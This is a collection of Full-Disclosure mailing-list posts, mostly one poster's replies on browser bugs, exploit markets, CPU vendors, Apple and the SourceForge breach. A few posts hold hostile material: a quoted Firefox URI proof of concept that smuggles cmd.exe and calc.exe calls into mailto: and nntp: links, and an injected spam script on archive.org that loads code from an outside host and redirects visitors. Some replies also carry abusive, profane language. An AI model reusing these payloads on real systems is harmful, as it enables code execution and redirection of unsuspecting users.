[Full-disclosure] Introducing libOnionRoute, the library to anonymize software
Hi Everyone: LibOnionRoute, the library to anonymize software was just released. It is basically a modification of Tor to transform it into a library you can link to your software. Some of us believe is more secure in some situations to use it like that. To find out more please visit: http://onionroute.org Regards Waldo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iPhone Geolocation storage
So many ppl waste so much time in dead end technology. Amazing. I once purchased a Mac and that's because it was old and extremely cheap. Didn't even used it. Nothing worked there. It hanged, the harddrive always got wrong bits in the bitmap after the hang. I wasted my money. Apple users are nothing but low end inferior animals to Apple Inc. I feel sorry about them. Honestly. Overpriced hardware tied to their software, infected with bugs to the bones, with abusive rules about the software they can run. And then they have to crack the very own hardware they payed so much money for. Poor animals. Now we know they are being tracked like cattle. And of course the decrepit argument that because software is digitally signed it won't let run anything malicious there. Hmmm that lie to an ignorant luser. Didn't the very own Ionescu loaded a non signed driver with a broken ATI driver and got his ass in Hollywood for doing that to windows. Hey the playstation got those proxy discs to load pirated discs years before. Are all applications in appstore bug free? :D Why they just doesn't say that they want to control the software market and apply monopolistic rules/rates? Too strong? Folks, just ignore them. They are a Zero already. Is not even worth to jailbreak their bullshit. That's exactly the game Apple Inc. want you to play. Use you like a rabbit so hackers break the platform and software developers take the bait. Same goes for users. They will think they have their amazing free piece of crap to then get an iBrick, software developers banned and hackers effort thrown in the trash can with an update that takes them seconds. And of course the press blah blah blah. Boring. On 5/4/11, Jeffrey Walton noloa...@gmail.com wrote: iOS 4.3.3 is now available. From the two iPhone forensics books I have, trimming the location database (consolidated.db) is like sticking your thumb in a hole in a New Orleans levy. It ain't gonna help much. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sourceforge entry point seems still active.
So it actually happened! Not surprising at all. I suspected at first sight about a phish attempt because the email in another domain they sent for contact in case of problems with password reset (didn't bothered about headers anyway). Seems mine was not compromised according to what they say Our analysis uncovered (among other things) a hacked SSH daemon, which was modified to do password capture. If i were them I would reinstall from scratch at least all SSH servers. They all could be compromised! On 1/30/11, exploit dev extraexpl...@gmail.com wrote: Sourceforge has reported a full report of attack. Seems very close to what I wrote in previous messages and reported in my blog posts related to this thread. Sourceforge Attack: Full Report http://sourceforge.net/blog/sourceforge-attack-full-report/ On Tue, Jan 25, 2011 at 9:18 PM, exploit dev extraexpl...@gmail.com wrote: Hi Andrew, just a reminder: this breach was used by php/python/perl script for get and save on user directory bot and remote shell. Also you could, as reported also in owned and exposed zine, launch commands and attempt privilege escalation. So I'm not so sure that this is not so writable as well i think is not right sayd that is not critical. Regards-. On Tue, Jan 25, 2011 at 8:47 PM, Andrew Farmer andf...@gmail.com wrote: On 2011-01-24, at 12:08, exploit dev wrote: Anyway, I'm sorry repeat my message. I think that this issue is a bit critical but I don't receive still any feedback, It's not particularly critical by any means. SourceForge projects all have their own web space, and there are doubtless a bunch of them running vulnerable versions of software. These sites are relatively isolated, and don't have write access to the project's SCM or downloads. -- http://extraexploit.blogspot.com -- http://extraexploit.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Making Security Suck Less
Aha, welcome to the world. It is broken and will likely keep that way for long. So do what i do... Adapt, take a seat, wear a green hat if you can and forget about the rest. They will not understand, nor they want to. Besides we would see a load of net admins loosing their jobs / companies filling bankruptcy if the model changes so... You know what.. Bertrand Russell said once: Men who are unhappy, like men who sleep badly, are always proud of the fact. Sort like the old way of saying don't worry be happy! :D And I have serious doubts about that OSSTMM btw. On 12/16/10, Pete Herzog li...@isecom.org wrote: Hi, Now not everything about the old security model is bad. Personally, I really like the Zen feel of it. It's like raking the fine, white, beach sand into those concentric lines and around rocks and dead fish and stuff. It's very Zen. Then as the tide rises, the wind blows, and Frisbees get badly thrown you have to do it all over again in a very Zen way like this: Install. Harden. Configure. Patch. Scan. Patch again. Update. Re-configure. Scan. Patch again. Uninstall. Re-install. Configure. And then you do it all over again! With so much Zen practice it's hard not to become a Master of the security repeat cycle. But you know what else is Zen? NOT doing that. It's less stressful to maintain an existing balance between operations, limitations, and controls then running around and putting out fires. This is from my new article called, Making Security Suck Less you can read finished at: https://www.infosecisland.com/blogview/10304-Making-Security-Suck-Less.html There's some more, new articles reviewing the OSSTMM and the new security model at InfoSec Island here: https://www.infosecisland.com/osstmm.html Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.badpeopleproject.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs
In any case i wonder how much google is going to respect corporate, industry secret or all that stuff you don't want them to know with google wave. Best thing to do is not to use that. I really doubt that it is an improvement and i think i will hardly ever need it. Is just more fanboi food. (knowing gmail how i know it and left for public stuff only how i left it) On Thu, Jan 21, 2010 at 5:28 AM, dramacrat yirim...@gmail.com wrote: inb4 front page news 2010/1/21 bugt...@cgisecurity.net Well, that's exactly what I'm saying. Pretending that this is some kind new exploit class simply because Google Wave is used is stupid. This is the logical extension of e-mail and instant message and social network attacks to the next potential platform. Following in the history of the security community, we should coin a buzzword on this old issue with a new spin. WaveJacking sounds like a perfect fit. /sarcasm On Tue, Jan 19, 2010 at 8:10 PM, valdis.kletni...@vt.edu wrote: On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik said: Yeah, no kidding. Surprise! Untrusted files can be malicious. If you accept files from those whom you do not trust, whether its via e-mail, instant message, Google Wave, or physical media, you well and truly deserve the virus that'll eventually infect your machine. Let's see.. *HOW* many years ago did we first see e-mail based viruses that depended on people opening them because they came from people they already knew? 'CHRISTMA EXEC' in 1984 comes to mind. The problem here is that Google Wave is for *collaboration* - which means that you're communicating with people you already know, and presumably trust to some degree or other. Hey Joe, look at this PDF and tell me what you think is something reasonable when the request comes from somebody who Joe knows and who has sent Joe PDF's in the past. I guarantee that if every time you receive a document that appears to be from your boss, you call back and ask if they really intended to send a document or if it's a virus, your boss will get very cranky with you very fast. Let's look at that original advisory again: An attacker could upload his malware to a wave and share it to his Google Wave contacts. Now change that to An attacker could trick/pwn some poor victim into uploading the malware to a wave Hilarity ensues. --000e0cd2e002580025047da0b22e Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Well, that#39;s exactly what I#39;m saying.=A0 Pretending that this is so= me kind new exploit class simply because Google Wave is used is stupid.=A0 = This is the logical extension of e-mail and instant message and social netw= ork attacks to the next potential platform.br br-- Rohit Patnaikbrbrdiv class=3Dgmail_quoteOn Tue, Jan 19, 2010= at 8:10 PM, span dir=3Dltrlt;a href=3Dmailto: valdis.kletni...@vt.e= duvaldis.kletni...@vt.edu/agt;/span wrote:brblockquote class=3Dg= mail_quote style=3Dborder-left: 1px solid rgb(204, 204, 204); margin: 0pt= 0pt 0pt 0.8ex; padding-left: 1ex; div class=3DimOn Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik said:br gt; Yeah, no kidding. =A0Surprise! Untrusted files can be malicious. =A0If= youbr gt; accept files from those whom you do not trust, whether its via e-mail,= br gt; instant message, Google Wave, or physical media, you well and truly de= servebr gt; the virus that#39;ll eventually infect your machine.br br /divLet#39;s see.. *HOW* many years ago did we first see e-mail based vi= ruses thatbr depended on people opening them because they came from people they already= br knew? =A0#39;CHRISTMA EXEC#39; in 1984 comes to mind.br br The problem here is that Google Wave is for *collaboration* - which meansb= r that you#39;re communicating with people you already know, and presumably= br trust to some degree or other. quot;Hey Joe, look at this PDF and tell me= br what you thinkquot; is something reasonable when the request comes from so= mebodybr who Joe knows and who has sent Joe PDF#39;s in the past.br br I guarantee that if every time you receive a document that appears to be fr= ombr your boss, you call back and ask if they really intended to send a document= orbr if it#39;s a virus, your boss will get very cranky with you very fast.br br Let#39;s look at that original advisory again:br div class=3Dimbr gt;gt; An attacker could upload his malware to a wave and share it to his= br gt;gt; Google Wave contacts.br br /divNow change that to quot;An attacker could trick/pwn some poor victim= into uploadingbr the malware to a wavequot; =A0Hilarity ensues.br br br br /blockquote/divbr --000e0cd2e002580025047da0b22e-- --===1022691582== Content-Type: text/plain;
Re: [Full-disclosure] Google Maps XSS (currently unpatched)
First of all, security is a myth. One can presume they're secure (or secluded) from danger sitting behind a firewall, but to do so is just foolish. Something is better than nothing ;). People in power love to say if you have nothing to hide then nothing to worry about when it comes to tracking, keeping data, searching data etc etc 1984 et al...but this is wrong. I'm not doing anything wrong in my eyes, but that may mean topperling the over bearing government that wants us all chipped, so my privacy is worth a lot. Once it's too late, it will be very difficult to get privacy back. Yet worse than being chipped is that somebody is looking forward to harm you. Even if they don't know you and even if also you don't know them. Never forget about that. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What the UK government care about in a hacker
How will the UK government contact you? Brute guys will jump out of a range rover land rover which will have darkened windows and will give you an offer you can't refuse after abducting you for five minutes based on your research post on Full-Disclosure. Guys? Nope. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tool release: extract Windows credentials from registry hives
Two Things Infinite: The Universe and Human Stupidity Albert Einstein Google Error Forbidden Your client does not have permission to get URL /files/creddump-0.1.tar.bz2 from this server. (Client IP address: xxx.xxx.xxx.xxx) You are accessing this page from a forbidden country. Why google code? Don't waste your time or others that want to download and use SourceForge, Codeplex, FSF, etc. and make them loose revenue. Is so laughable that even the license permits redistribution in the first place and mirroring it won't be a crime. And then proxies / bouncers / tunnels. But then why make you or your visitors loose time? Or... maybe Google want us to make mirrors without limitations of it's entire website and make us get the revenue they won't ;). Let us know google we are impatient to clone your SF takeover attempt sh... without restrictions. On 2/20/08, Brendan Dolan-Gavitt [EMAIL PROTECTED] wrote: CredDump is a new tool implemented entirely in Python that is capable of extracting: * LM and NT hashes (SYSKEY protected) * Cached domain passwords * LSA secrets It has no dependencies on any part of Windows, and operates directly on registry hive files. It is licensed under the GPL and intended to be easy to read, so you can find out how various Windows obfuscation algorithms work by reading the code. (I will also be posting a series of articles explaining the algorithms in detail on my blog in the coming weeks). You can download the tool at: http://code.google.com/p/creddump/ Or read a more detailed introduction at: http://moyix.blogspot.com/2008/02/creddump-extract-credentials-from.html CredDump is based on the hard work of many people, so please to read the credits section in the README. Cheers, Brendan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
Hello: On 9/29/07, Andrew Farmer [EMAIL PROTECTED] wrote: If your bank is doing financial calculations using Javascript in a standard web browser, you have bigger things to worry about than roundoff errors. Ok let's explain this with more details because I realize that you got something else (and might be the case of others). I was not refering to banks performing all of the calculations on the browser. That would be insane because users would be manipulating that for sure changing a couple of web pages. A bank would not last a single day on the internet in such case. I was commenting you about some calculations done in your browser so you don't have to make them in your head, your operating system calculator or a pocket calculator. Taxes and other kind of financial calculations for example. Hey I could add a financial calculator on one side of a page so you don't have to pick one. I don't know wich calculus you could do I'm not a banker (not yet. I tell you by then). The browser can do that kind of things better than you. I don't know an exact example but it could be the case. Remeber there are a zillion websites out there. All the bank needs to be sure is that all of the movements you do does not exceeds your balance. If you (or your browser) intentionally or not performs the calculation wrong... Well... that is your problem. You won't steal money with that to the bank. And that kind of things are very likely to be putted into the browser more and more with AJAX, SilverLight and all of them just to prevent mistakes in the first place. Is the trend. So a rounding bug in javascript (in such case) could be really serious. Also notice that if there is really a problem in FF javascript engine it goes beyond the browser. You could run Tamarin, Spidermonkey or Rhino on the server side and perform some processing there with javascript. http://developer.mozilla.org/en/docs/About_JavaScript Another common application for JavaScript is as a (web) server side scripting language. A JavaScript web server would expose host objects representing a HTTP request and response objects, which could then be manipulated by a JavaScript program to dynamically generate web pages. I based my previous comments on comments from some other persons but not on my tests. I tried this code and is giving me the same result ( 5.1005) in IE 6, FF 2.0.0.7 and Opera 9.23: html script type=text/javascript a=5.2; b=0.1; alert(a-b); /script /html This one is giving me the same numbers too in every browser: html a href=javascript:alert(5.2-0.1)arrf/a /html So seems to me that IE is actually performing those calculations with higher precision only when used as a calculator (directly in the address box) but not in javascript code (fortunately). However let me know if you find something. I'm interested and would like to be aware of it. As a side comment I wanted to tell you that what is out there on the internet is not a standart. Is what IE dictates. IE rules the internet whether you like or not. It comes from a big one and also comes preinstalled. That's why it holds a big share of the market. It imperates and has a lot of pressure on the content published on the internet. As IE adapts to the web, the web also adapts to IE. As another side comment about the FP math. Well don't worry I already did that some time ago. While I'm not the expert in numeric math that was the first part of the first course of numeric math on my second year. As a curiority and also a very usual mistake is that in FP math a + b + c is not always equal to a + c + b. You must sort the numbers before doing that and do the calculus from lower to higher if you want the most accurate results. Yes FP math is tricky sometimes and a lot of care must be taken with it since is not real math but approximations. For example sometimes you need to make transformations to equations or use Taylor. It might look boring at first sight but when you look closer you realize that is very important and catches your eye. Regards Waldo Alvarez ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
If I use strcpy() to read user input into a buffer, I am at fault and not C compiler. I don't think that's a fair comparison. If you make the right algorithm and you do not get the expected results *is* not your fault but what are you sitting at (compiler, framework, library ...). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox 2.0.0.7 has a very serious calculation bug
Hello: On 9/28/07, Jimby Sharp [EMAIL PROTECTED] wrote: How is this serious and is it related to security in any manner? If not, please do not spam. :-( Many bugs are security related (I would say all). How it is security related? Think. What happens if your bank calculates something wrong and puts the lower in your account and the higher in another account? Yes It might be little but what about a little many times? That could be done with javascript too. Then... you are not safe anymore. Specially today with the invasion of AJAX. One of the browsers is broken for sure (several?). They should do the same even in such small things. Should at least be very carefully documented. However just documenting it is only going to bring trouble since many programmers won't be aware of that. They would not even be making mistakes in the code but triggering somebodie's else errors. This kind of stuff happens many times. For instance a couple of days ago I hitted a problem in wich both Opera and Firefox behaved differently to IE (some parameters in the form where not sent to the server). Was with a tableform/form/table instead of formtable/tableform (or the other way around can't remember right was the workaround). Yes, every bug is security related. A database that is out of synch. An improperly rounded number. Remember why Arianne blowed up on the air because of this? Remember the mars landrover locked because of a priority inversion bug? Would you call it a security bug? I really doubt many of you would. However millions were lost. Wasn't security related? Think. What about if someday the computers that handle the nuclear plant nearby make a wrong rouding and one of the parameters go out of rank? Computers handle that, handle your car, all of your communications, your heart beat and even your foot steps (heard about those smart Adidas with a chip?). What if an airplane computer miss one of the parameters? It *is* a security bug even if it is not a stack/heap overflow, an integer overflow and all of the rest you all know about. I consider if not all of the bugs, at least the vast majority as security bugs. For your very own good start thinking that way too. Because someday you could even die just because somebody's else made a mistake in one of those control systems. Worst yet... because someone thought that it wasn't a security bug and was not important to fix it. Regards Waldo Alvarez PD: Now you have another way to verify (fingerprint) wich browser is used to browse a website even with spoofed User-Agent headers if javascript is turned on. And go and learn some floating point maths. On 9/28/07, carl hardwick [EMAIL PROTECTED] wrote: There's a flaw in Firefox 2.0.0.7 allows javascript to execute wrong subtractions. PoC concept here: javascript:5.2-0.1 (copy this code into address bar) Firefox 2.0.0.7 result: 5.1005 (WRONG!) Internet Explorer 7 result: 5.1 (OK) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] www.archive.org --- XSS (and under attack)
Hello:
I could take a while to investigate this more but I have no
time ATM (veeery busy) and the website is under attack. (should be a
matter to try that script on some form. Get a virtual pass for the library,
digg in the book publishing forms and report back)
Try this links:
http://www.archive.org/details/BuyPhentermineOnline_979
http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery
Parts of the HTML follows to help spot the hole
...
a href=/search.php?query=subject:%22 free delivery%22 free
delivery/a/p/divp xmlns:fo=http://www.w3.org/1999/XSL/Format;
class=content style=text-align:left;script language=javascript src=
http://rico05.com/counter/counter.js?id=950key=buy+phentermine;/script
...
/- counter.js (called directly) -/
var ref = escape(document.referrer);
document.write('\script language=\javascript\ src=\
http://rico05.com/counter/counter.js?ref=' + ref + '/script\');
/- EOF -/
/- counter.js (with referer forged) -/
document.location = 'http://rico05.com/search/?said=951q=buy phentermine';
/- EOF -/
And that's it. A lot of money spamming users.
Who is said=951? Ask rico05.com if they are not a bunch of phishers should
tell you.
Regards
Waldo Alvarez
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote hole in OpenBSD 4.1
Hello: Maybe if their microcode where open or at least not encrypted (was DES?) we could disassemble it and see for ourselves. Right now it doesn't matters if you can read the source code of your entire operating system + drivers + apps or even your ROM. At the end they got you whatever you run there linux, windows, BSD whatever just pick (ohh yes you only need to send special data over the net and you could be running code even in ring -1 if you have control of the microcode). I wish I could have an electron microscope. Yes call me paranoid but this days you have to. Probably all of their CPUs from Intel, AMD and many others have several flaws buried inside them for years. Maybe exploitable by someone who by chance found one. That is not a surprise given the facts that we all have seen several flaws in the past to the point that they decided that the microcode should be updated. Great feature btw they realized too late about that. Any company considering to make a Neutral CPU? Think about that, emulation at full speed of several architectures PPC, SPARC, x86, x64 (maybe even at the same time) reduced costs since the extra cost on microcode development and no copy-you-are-mine infringement since that would be code from somebody else. Many of us would be happy to pay for our freedom and by the way trow away dynamic translators. That will sell like water. Think about that. The next revolution ;) Yep maybe talking I'm loosing this vision. Ok one out of the basket. And yes Intel has made a lot of sh.. in the past in order to harm other competitors. They ended hurting users in the end. Remember the time you could buy Intel AMD or Cyrix without changing your motherboard? Ahh now the motherfuckers made you buy one or the other with their copycrap in the sockets. I probably would have AMD by now (In my opinion they have proven to offer better stuff in the long run maybe not high clocks but certainly higher performance or lower costs or better per watt performance or great features). Now there is VT and Pacifica, several versions of 3D now and SSE. And thanks to M$ (yes thanks a lot) we got compatible 64 bits. Otherwise they would be doing the same sh. Jaj maybe they end up copyrighting your opcodes. At the end lots of millions are lost for their fucking battle making things inoperative with each other. Programmers breaking their heads because we have to work and learn double triple ... ad infinitum. Users complaint because X soft is only compatible with 3D now/SSE or whatever thing and then almost nobody uses that (MMX at most). There should be laws that would prevent them from doing that kind of things that hurt everyone (including them) in the long run and make the life of millions of persons problematic just because they want to hold a share. That is not development. Period. And about the deRaadt thing being paid by AMD. Yes well maybe you are right maybe not. But then remember the BP I watch too much Matrix Trilogy crap just before Intel releasing their shinning hard. That is a bad taste joke. AMD is in fact safer than VT if combined with the proper hardware. Maybe in practice is not implemented by vendors (there is where the real problem would be) but then that is probably a first step to later move the Trusted Platform completely inside the CPU. Now who started the war I pay a tech bitch (sorry but that's what they are if they actually are paid for telling us lies) on the flaws side? ding ding INTEL... Again?!?! I'm not an x86 CPU historian but this is what I have seen so far (not in chronological order) and it stinks AMD makes 3Dnow Intel makes incompatible SSE AMD starts to grab too much users on the low end market --- Intel makes the socket copyrighted (of course AMD answers with the same) AMD 3DNow 2 --- Intel SSE2 SSE3 SSE4 AMD makes 64 bits --- Intel tries to make incompatible 64 bits and M$ says that there won't be a windows for that and Intel gives up. I would have preferred to give a final kick to CISC so actually didn't liked the AMD version but hey at least we have compatible things. AMD makes designs for up to 8 cores --- Intel simply had to RUN (fortunately they could not do anything else) AMD makes Pacifica (Secure Virtual Machine) --- Intel makes a low end version they called VT that only has a turn me off bit (fortunately something can be done about this) or... where is the SKINIT equivalent? Intel pays a tech bitch to distract buyers from buying insecure AMD chips --- AMD pays a tech bitch to distract buyers from buying faulty/insecure Intel chips. At least that's what looks like in both sides. Of course who can proof that? Any of those they are paying claims could be true or not, there is no real evidence. Fortunately we can verify both fault claims. For the first one reading the docs, and for the other claims trying some POC with a CPU that is not updated. However M$ released almost silent updates for the microcode driver, that's some evidence that suggest that
Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
today when we download files from the internet. But worse is what they tell you to do. Download only from safe places (what is a safe place? a safe website?). Keep your antivirus up to date etc etc. Yeahh your antivirus up to date. Until it is face to face with a modified version of morphine or whatever protector around covering your favorite worm. Resuming something like this http://releases.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/source/firefox-2.0.0.5-source.tar.bz2.asc but for binaries not only sources. And the public key visible by everyone over SSL. Today you first have to hunt for the key and the signature is only provided for the source packages. ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5/KEY. FTP = Anybody can modify that in transit. Then you can read there: Please realize that this file itself or the public key servers may be compromised. You are encouraged to validate the authenticity of these keys in an out-of-band manner. ... Mozilla developers: please ensure that your key is also available via the PGP keyservers (such as pgpkeys.mit.edu). Then after digging in pgpkeys.mit.edu you can finally find it here http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x0E3606D9 All of that comes in clear text even if you try to use SSL for pgp.mit.edu. Where is the security? Nowhere. The security of the world fits in a cup of coffee. Period. Now you could ask yourself: Sure but why Firefox? That applies to all sort of binaries around. Yes unfortunately it does. But then browsers are sensitive software. But then FF is pretty popular (and growing) and should serve as an example to others. Is open source so no problem about sharing it at all since was made to be shared. That's why. Why not X company? Remember they are too superior to even listen so I won't waste my time with them. However I know some of them are already reading this and I hope that at least they start to consider that. it's not like we are passing you an executable... if you are concerned that it will be modified in transit, you could always visit httpS://xs-sniper.com. Don't worry I have absolutely no intention to visit your website that takes advantage of someone's else findings for you own advertising profit. I can find better information about that in bugzilla. And next time save your S. You are typing extra. I'd think SSL would provide more than reasonable security around that concern. If you need more, you could send me your private PGP key and I could send the exploit to you directly. :) Sure I can send you one of my *private* keys + public revocation certificate (or an expired private key). But then why waste my time? Maybe If I send you a public one you can try to play with Shor (I recommend you to first try to understand emails or get a brain before you try that). Remember that you need to buy a computer with 8195 qubits to run the Period finding routine. You can't do that with your Pentium X. Try your local dealer !! Pissed off? Yes I know that last part really stinks. With that I'm paying you with the very same coin so you can see how it looks from the other side. The point? Don't do to others what you don't like to get back. Try that option next time!! Take it as a lesson. And grow buddy, you are still in the part I'm l33t and better than everyone the part when you honestly look like a... (a word that you won't properly interpret) . No offense this time. Have a nice day Waldo Thanks, Nate On 7/25/07, wac [EMAIL PROTECTED] wrote: Well I hope the next version won't open 45 internet explorers when I click the mailto URLs. And that when you download something you don't have the save button enabled by default (and with that delay to avoid return hits security things) It should have enabled by default the cancel button. Instead of everybody having to wait a century to get the save button activated. Is so broken that way. Ahh and to prevent clicks the dialog displayed somewhere away from the mouse pointer. Ahh and by default no having enabled the open with when you download but the save as (somebody can hit enter without noticing). Hey maybe configurable? And what about providing in the website some hash over SSL so you can verify that is was not modified on the fly when you download? I mean encrypting every download around is simply brain dead but a hash is OK. Hey what about a digital signature you could verify with a public key? Zero overload on servers ;) Regards Waldo Alvarez. On 7/25/07, Mesut EREN [EMAIL PROTECTED] wrote: Hi all, FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5 . But don't work is code. Example code is mailto:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat nntp:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe
Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
Well I hope the next version won't open 45 internet explorers when I click the mailto URLs. And that when you download something you don't have the save button enabled by default (and with that delay to avoid return hits security things) It should have enabled by default the cancel button. Instead of everybody having to wait a century to get the save button activated. Is so broken that way. Ahh and to prevent clicks the dialog displayed somewhere away from the mouse pointer. Ahh and by default no having enabled the open with when you download but the save as (somebody can hit enter without noticing). Hey maybe configurable? And what about providing in the website some hash over SSL so you can verify that is was not modified on the fly when you download? I mean encrypting every download around is simply brain dead but a hash is OK. Hey what about a digital signature you could verify with a public key? Zero overload on servers ;) Regards Waldo Alvarez. On 7/25/07, Mesut EREN [EMAIL PROTECTED] wrote: Hi all, FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But don't work is code. Example code is mailto:%00%00../../../../../../windows/system32/cmd%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat nntp:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat Where i missing? Mesut EREN BAŞAK ÇATI CEPHE SİSTEMLERİ Bilgi İşlem Sorumlusu MCSA:S,MCSE:S,CEH,CCNA [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)
On 7/8/07, jt5944-27a [EMAIL PROTECTED] wrote: thank you? okay - thank you for creating this wonderful software that we use. thank you for listening to our defect requests and thank you for addressing them in a meaningful time frame. but thank you for finding bugs? are you on drugs? Drugs? What are you talking about? That is completely off-topic. A hit that bounces back to yourself. they didnt ask you to look for defects. this sounds like those people who paint house numbers on your curb and then want to be paid even through you never said to paint the numbers. or those windshield washers who want you to pay them for smearing your window when you didnt ask for it. the only people who should be paid to find vulnerabilities are the people asked to find vulnerabilities. What about those who come right into your face without even trying to find them? Hey we know how software works. We are all using it and we can think. And sometimes we can track them down too. Don't forget that. And what about those bugs that are created on purpose. A trojanized software or device is too obvious (remember NSA-Crypto AG). But a security bug. Well sorry we made a mistake we are providing a fix. However can serve the same purpose as a trojan horse. They simply can know earlier and fix it later if something goes out of control. That could explain why fixes take so much time sometimes and why there are so many bugs. (Just a theory with some base). No, ppl searching for vulnerabilities should not be only the ones asked to do it. Should be every third party around. And guess what. It is being done right now for whatever purpose. Won't be better if they are sold in the public light than in the shadows? At least we know what is flawed otherwise not even a clue. You are right now only looking at the top of the iceberg. After looking at that website and looking at yahoo messenger 8.1 being on sale I am considering not to use it for a while or put it under a protection layer or use alternatives. Why? Somebody else could have found that too and could be using it. And if somebody asks my opinion to install some soft listed there I would tell them not to do it because it is not safe. That means security after all. And if they make money. Then good. Somebody that knows how to find them was rewarded and encouraged to do more research. Something you forgot to do before distributing to ppl. Yep cutting the bill putting ppl under risk. That reminds me cars that exploded because of bad design and ppl becoming ill with cancer or something else by feeding chickens with hormones and stuff like that. On the other side I am pretty sure that those grey foreigners you all talk about already have their own working teams and already have undisclosed technology. The one you don't know. You better favor research so you can put the finger on the hole before water begins to flow. But using your very own who asked you. I could reply also to you. Who asked you to make a software/service/device? Yet more who asked you to make something that is broken? But yet more who asked you to make something that is broken and that you sell/provide as if it is good? But then I don't want to reply to you that way because I understand that things needs to be done even if nobody asks for them. That also applies to security research. Hey many times people doesn't ask because they simply ignore things. And about the windshield washers. Well you could understand that they are usually ppl with extreme need for some cash (otherwise they wouldn't be doing that) many times just to eat while you drive your fancy car. You could be more human than that. If I were in that situation and I have some cash and some of them smear my windshield I would not be poorer/richer for giving them something. That would make me a lot better than you. After all they are working, not robbing/assaulting ppl on the streets or hitting your neck to steal your wallet. Or do you prefer that? They have the right to live too and you are pushing them to find desperate alternatives. That's what is wrong. And since you are simply taking the example to compare it with security research then take it back to the original example, compare and see for yourself. should we pay burglars for breaking into our homes? No we could pay key makers that know when your lock can be broken so a burglar doesn't break into your home. That's quite different. You will be paying for your own security. Hey burglars are already paying for that and you are only complaining. Doing it is not going to change anything. Don't you think is better to try new or better alternatives? Even if that means that you will make a little less money or that it will cost you a little extra? and what about open source projects? should nonprofit groups be forced to pay for defects that they never asked people to look for? Good point but I already have a couple of answers to you because that crossed my mind too. 1- Open Source != 0 profit.
Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)
On 7/8/07, Dave Hull [EMAIL PROTECTED] wrote: On 7/8/07, ascii [EMAIL PROTECTED] wrote: Dave Hull wrote: Yep. This is nothing new (and nothing noble), there are at least a handful of web sites that will buy zero days. Maybe we should start zeBay. Because you are noble? Or to start something new? That was a joke. I thought it was obvious. The vulnerability researchers that I know and respect have been practicing responsible full disclosure for years. They aren't in the business of finding vulnerabilities so they can sell them. Maybe they don't need the money. I can bet you that there are more that need it than those that doesn't. Responsible full disclosure moves the software industry forward and helps us all. Why not encourage research? Companies make a lot of money selling soft/hard/systems or giving tech support for the very same broken thing. I think that also non security related bug hunting should be encouraged. And if it is sold to the biggest bidder then those companies will have to put more in the research or pay the information or be responsible for their own broken code and the result of letting that information to fall in wrong hands by not buying it. Unpatched holes are being sold every day and nobody knows. At least with an open market everybody can know what is around and even take countermeasures. By not using the software/hardware/system for a while for example. 